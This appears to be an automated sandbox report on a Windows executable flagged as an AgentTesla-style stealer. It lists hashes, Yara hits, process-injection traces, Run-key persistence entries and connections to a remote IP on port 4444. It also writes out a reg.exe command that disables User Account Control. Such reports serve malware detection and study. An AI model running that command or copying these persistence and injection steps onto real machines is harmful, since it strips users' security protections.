Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Sept. 7, 2021, 8:23 a.m.	Sept. 7, 2021, 8:36 a.m.

Size	440.5KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`754cae6c58cfb857c870d38ef49e2959`
SHA256	`d1ba03fd533eb3834a4448172fc9f792ed54096f2718a84eebf719cb22d2fa1e`
CRC32	`62C55D72`
ssdeep	`12288:9Ye6UWhaT5xnDdLv9rX+1jZJqxE/ZjEcyib:v6UWUT5xDN9IjZJsCZDyg`
Yara	PE_Header_Zero - PE File Signature Generic_Malware_Zero - Generic Malware OS_Processor_Check_Zero - OS Processor Check Malicious_Library_Zero - Malicious_Library IsPE32 - (no description) Malicious_Packer_Zero - Malicious Packer

explorer.exe "C:\Users\test22\AppData\Local\Temp\explorer.exe"
560
- cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  2100
  - reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    1260
- wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\install.vbs"
  1744
  - cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Windows\SysWOW64\explorer\explorer.exe"
    2816
    - explorer.exe C:\Windows\SysWOW64\explorer\explorer.exe
      688
      - cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        2168
        
        reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        1632
      - svchost.exe C:\Windows\SysWOW64\svchost.exe
        2212

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
107.180.56.180	Active	Moloch
46.8.211.72	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (4 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 7, 2021, 8:23 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 7, 2021, 8:23 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 7, 2021, 8:23 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 7, 2021, 8:23 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 7, 2021, 8:23 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.gfids

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Allocates read-write-execute memory (usually to unpack itself) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 7, 2021, 8:23 a.m.	process_identifier: 1744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f62000 process_handle: 0xffffffff	1	0	0

A process attempted to delay the analysis task. (1 event)

description

explorer.exe tried to sleep 235 seconds, actually delayed analysis time by 235 seconds

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\install.vbs

Creates a suspicious process (2 events)

cmdline	"C:\Windows\System32\cmd.exe" /c "C:\Windows\SysWOW64\explorer\explorer.exe"
cmdline	C:\Windows\SysWOW64\svchost.exe

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\install.vbs

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\explorer.exe

A process created a hidden window (4 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Sept. 7, 2021, 8:23 a.m.	thread_identifier: 2096 thread_handle: 0x000000c4 process_identifier: 2100 current_directory: filepath: C:\Windows\System32\cmd.exe track: 1 command_line: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000000c0	1	1
ShellExecuteExW Sept. 7, 2021, 8:23 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\install.vbs parameters: filepath: C:\Users\test22\AppData\Local\Temp\install.vbs	1	1
ShellExecuteExW Sept. 7, 2021, 8:23 a.m.	show_type: 0 filepath_r: cmd parameters: /c "C:\Windows\SysWOW64\explorer\explorer.exe" filepath: cmd	1	1
CreateProcessInternalW Sept. 7, 2021, 8:23 a.m.	thread_identifier: 2428 thread_handle: 0x000000c4 process_identifier: 2168 current_directory: filepath: C:\Windows\System32\cmd.exe track: 1 command_line: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000000c0	1	1

The binary likely contains encrypted or compressed data indicative of a packer (1 event)

section

{u'size_of_data': u'0x00000600', u'virtual_address': u'0x00070000', u'entropy': 7.749530141861938, u'name': u'.rsrc', u'virtual_size': u'0x000005fe'}

entropy

7.74953014186

description

A section with a high entropy has been found

Yara rule detected in process memory (19 events)

description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Google Chrome User Data Check	rule	Chrome_User_Data_Check_Zero
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Win.Trojan.agentTesla	rule	Win_Trojan_agentTesla_Zero
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	browser info stealer	rule	infoStealer_browser_Zero
description	File Downloader	rule	Network_Downloader
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook

Terminates another process (2 events)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess Sept. 7, 2021, 8:23 a.m.	status_code: 0x00000000 process_identifier: 2332 process_handle: 0x000000d0		0	0
NtTerminateProcess Sept. 7, 2021, 8:23 a.m.	status_code: 0x00000000 process_identifier: 2332 process_handle: 0x000000d0	1	0	0

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
cmdline	/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

Communicates with host for which no DNS query was performed (2 events)

host	107.180.56.180
host	46.8.211.72

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Sept. 7, 2021, 8:23 a.m.	process_identifier: 2212 region_size: 479232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000001bc	1	0	0

Installs itself for autorun at Windows startup (50 out of 120 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer	reg_value	"C:\Windows\SysWOW64\explorer\explorer.exe"

Network communications indicative of possible code injection originated from the process explorer.exe (5 events)

Time & API	Arguments	Return
connect Sept. 7, 2021, 8:23 a.m.	ip_address: 46.8.211.72 socket: 280 port: 4444	4294967295
connect Sept. 7, 2021, 8:23 a.m.	ip_address: 46.8.211.72 socket: 464 port: 4444	4294967295
connect Sept. 7, 2021, 8:24 a.m.	ip_address: 46.8.211.72 socket: 300 port: 4444	4294967295
connect Sept. 7, 2021, 8:24 a.m.	ip_address: 46.8.211.72 socket: 480 port: 4444	4294967295
connect Sept. 7, 2021, 8:25 a.m.	ip_address: 46.8.211.72 socket: 484 port: 4444	4294967295

Potential code injection by writing to the memory of another process (6 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Sept. 7, 2021, 8:23 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ªB0îâ,cîâ,cîâ,cZ~Ýcüâ,cZ~ßcOâ,cZ~Þcðâ,cç¨cïâ,cpBëcìâ,cÕ¼/bôâ,cÕ¼)bÔâ,cÕ¼(bÌâ,cç¿cûâ,cîâ-cñã,cy¼%b±â,c\|¼Ócïâ,cy¼.bïâ,cRichîâ,cPELMSaàÄl÷0@PÇÜþ80l8Älhl@0t.text¶ `.rdatao0p@@.data\= @À.tls à@À.gfids0ð@@.rsrcþ¢@@.reloc8:¨@B base_address: 0x00400000 process_identifier: 2212 process_handle: 0x000001bc	1	1
WriteProcessMemory Sept. 7, 2021, 8:23 a.m.	buffer: ÿÿÿÿ±¿DNæ@»ÿÿÿÿ Copyright (c) by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.ÿÿÿÿ ´tE¸wE²tE..¡FL¶FL¶FL¶FL¶FL¶FL¶FL¶FL¶FL¶F¡FP¶FP¶FP¶FP¶FP¶FP¶FP¶F¡Fÿÿÿÿ¸wE¨¢F¨¢F¨¢F¨¢F¨¢F¡F8zE¸{EEè¡F§FCPSTPDT°¢Fð¢Fÿÿÿÿÿÿÿÿÿÿÿÿ ¤`y!¦ß¡¥àü@~ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ§Fþÿÿÿþÿÿÿu0Ï!tåa¾e¸Â¢z»^ âÈ¨346E.?AVtype_info@@46E.?AVbad_alloc@std@@46E.?AVbad_array_new_length@std@@46E.?AVlogic_error@std@@46E.?AVlength_error@std@@46E.?AVout_of_range@std@@46E.?AV_Facet_base@std@@46E.?AV_Locimp@locale@std@@46E.?AVfacet@locale@std@@46E.?AU_Crt_new_delete@std@@46E.?AVcodecvt_base@std@@46E.?AUctype_base@std@@46E.?AV?$ctype@D@std@@46E.?AV?$codecvt@DDU_Mbstatet@@@std@@46E.?AVbad_exception@std@@46E.H46E.?AVfailure@ios_base@std@@46E.?AVruntime_error@std@@46E.?AVsystem_error@std@@46E.?AVbad_cast@std@@46E.?AV_System_error@std@@46E.?AVexception@std@@ base_address: 0x0046a000 process_identifier: 2212 process_handle: 0x000001bc	1	1
WriteProcessMemory Sept. 7, 2021, 8:23 a.m.	buffer: base_address: 0x0046e000 process_identifier: 2212 process_handle: 0x000001bc	1	1
WriteProcessMemory Sept. 7, 2021, 8:23 a.m.	buffer: +ÔÔ?¤Ø¾Ø?Ù?)s?ÚuZ55g;Ù.~~Dñìð??m(À'ÆØØ®õÐûõÛÝÛÝÛ(jk¡iæÞ\F£ã¥w¡Ô(´öä¼éÙ b Er4NPNWN]TUZ[ äøää äö_^îØØäüûüû í9<8;ú` ¢§µ¶³´±²¯°¸ Y base_address: 0x0046f000 process_identifier: 2212 process_handle: 0x000001bc	1	1
WriteProcessMemory Sept. 7, 2021, 8:23 a.m.	buffer: X0HläSETTINGSÎ/Gíþh×´(e7lìiF7rY¥ð,jE}ÃeÔH±gEÐÔ©ÅßÍYäÄ`ç=^ÈªbÖêäÀô74ãÞ +5¥im£²K1,:ÓÞ:Ú#ÃWªv'Ìóª8vG{íb¹ÝMiF(5³ÜÓ¯l¢DU`ÊÔ2 C`ÊÇï+{¯x9º=ù6áÔü \7Úá`ò_fC'\|ð.±^pKV-:Ëü½/SÛD6 ïv;ÄAðÖºûQçñÞn-3¨ý[UÛ@ BìêbÚxÏìþý"ªñÉü8»ña±á&¸kûO¨üùrB[XxîQV+ÂOK¦£È÷R ù%¼+g½I¹pÑÒoº{{9XÍJòÖ°Ò(\×è4Ç$û±5§9G]¾v/¸? Í&©e%$Fùð¾Ýã º¼À,óØUg7LÇ¸å#^3æèÎú2yÖ1Ç¯r×Iê?T¥y÷oæH¶òc¸û×Ï ¬ 5Gjó$,ÎÁ¸G _öÿ"ªÄáÛ zåÄP¥,ø¢VBOØF\APa<EþéÑ_óéSP¢ÉrÆ£1ÅoJ6ÔÒññtFquáù¨bI´¶µYbLxu¬-ð,ýuá`¢T?ÇC{õ¸ç§í ñÐÂIµ j±Û!ÃZlV>£¾>F N«ÛÎ qÀï úIÞð¼~Â2±:Ñ"£±!ïe»u+ÐPU¹¾ËÙgÒDÈ¨p+eFÏñê±Oaká:çÝr¼z³¡4;À§Lð-= Ê pÅèK6ijU´½ó¦M¨£j³.äèý#KÈ.Õeyæ<\|¹¾þ ææv6kµQê ÜÕÑ790 MÖ>¡±L«Qëåû`òw«öPÐOù[ºàÄIQACþÖ[ËX)ÿÌÚl/íÚÈ ©\|êZlof0¦_È´MhÒêyY·{1kWÒñX(Ô.Xtö¨Å¬¯m.Ð}3Gv²:a¦ÛÔ¡:áy©0#úmÒÈÅêß×®8Ñÿ·-ò¿ë©±á<®iënÊ%Î!\|`6ö"7&UH%ä¦zm9â÷^RBYÝÞËüVAá¥¹º¢<· wHõ3.Å´L\|ú±¶ì!¥ÒºæíCDoÙB_aËó$È²KûÑÑ/QrWÿ¤µÉnm&?8Ü2ýµÔX\|;Öè2æß®Ä¯ÛÓÞ3÷PÆ2×¶÷_Ëß.Ñkµø!q°¸Â+4ZîÈ¯ò Ë "g²AÎ½·HNã ¸Òø\Î±\|óõra Gè'ÖùHV@×åhÝö³,ù+óò éS«éMÁºñraZF¾Y°[a©ZR§\|·GxJÚw«>µ$$æÚQ-¶þ¼Íh×.9gjÝ!2A{¯WâÈ0ËÆVÅÈ\|\`(LýÆ#¹`ëÉ l¿\|f©E6ìt¼«Å2ÎfqWàKûmoèó§°7æ$i¤Ý;ì£3JzhfÁù+»ßhILÒÂÍÇ£CûCcñ÷Æ $ªX[\+8yÔOÈ4¤h%dÛ´îue¤ (èÂÝ©W¡X,&ÁñqÌ½vf<83ÄO²·jtW~W1~ÞÇßqô+ù!: base_address: 0x00470000 process_identifier: 2212 process_handle: 0x000001bc	1	1
WriteProcessMemory Sept. 7, 2021, 8:23 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2212 process_handle: 0x000001bc	1	1

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Sept. 7, 2021, 8:23 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ªB0îâ,cîâ,cîâ,cZ~Ýcüâ,cZ~ßcOâ,cZ~Þcðâ,cç¨cïâ,cpBëcìâ,cÕ¼/bôâ,cÕ¼)bÔâ,cÕ¼(bÌâ,cç¿cûâ,cîâ-cñã,cy¼%b±â,c\|¼Ócïâ,cy¼.bïâ,cRichîâ,cPELMSaàÄl÷0@PÇÜþ80l8Älhl@0t.text¶ `.rdatao0p@@.data\= @À.tls à@À.gfids0ð@@.rsrcþ¢@@.reloc8:¨@B base_address: 0x00400000 process_identifier: 2212 process_handle: 0x000001bc	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 688 called NtSetContextThread to modify thread in remote process 2212
NtSetContextThread Sept. 7, 2021, 8:23 a.m.	registers.eip: 2007957956 registers.esp: 2554328 registers.edi: 0 registers.eax: 4388716 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000001c0 process_identifier: 2212	1	0	0

Expresses interest in specific running processes (1 event)

process: potential process injection target

explorer.exe

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	"C:\Windows\System32\cmd.exe" /c "C:\Windows\SysWOW64\explorer\explorer.exe"
parent_process	wscript.exe				martian_process	cmd /c "C:\Windows\SysWOW64\explorer\explorer.exe"

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 688 resumed a thread in remote process 2212
NtResumeThread Sept. 7, 2021, 8:23 a.m.	thread_handle: 0x000001c0 suspend_count: 1 process_identifier: 2212	1	0	0

Created a process named as a common system process (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Sept. 7, 2021, 8:23 a.m.	thread_identifier: 2440 thread_handle: 0x00000084 process_identifier: 688 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\SysWOW64\explorer\explorer.exe track: 1 command_line: C:\Windows\SysWOW64\explorer\explorer.exe filepath_r: C:\Windows\SysWOW64\explorer\explorer.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1	0

Disables Windows Security features (1 event)

description

attempts to disable user access control

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

46.8.211.72:4444

Executed a process and injected code into it, probably while unpacking (23 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Sept. 7, 2021, 8:23 a.m.	thread_identifier: 2096 thread_handle: 0x000000c4 process_identifier: 2100 current_directory: filepath: C:\Windows\System32\cmd.exe track: 1 command_line: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000000c0	1	1
CreateProcessInternalW Sept. 7, 2021, 8:23 a.m.	thread_identifier: 3068 thread_handle: 0x000002bc process_identifier: 1744 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\wscript.exe track: 1 command_line: "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\install.vbs" filepath_r: C:\Windows\System32\WScript.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002b4	1	1
CreateProcessInternalW Sept. 7, 2021, 8:23 a.m.	thread_identifier: 2420 thread_handle: 0x00000084 process_identifier: 1260 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\reg.exe track: 1 command_line: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f filepath_r: C:\Windows\System32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
CreateProcessInternalW Sept. 7, 2021, 8:23 a.m.	thread_identifier: 2208 thread_handle: 0x00000330 process_identifier: 2816 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c "C:\Windows\SysWOW64\explorer\explorer.exe" filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000340	1	1
CreateProcessInternalW Sept. 7, 2021, 8:23 a.m.	thread_identifier: 2440 thread_handle: 0x00000084 process_identifier: 688 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\SysWOW64\explorer\explorer.exe track: 1 command_line: C:\Windows\SysWOW64\explorer\explorer.exe filepath_r: C:\Windows\SysWOW64\explorer\explorer.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
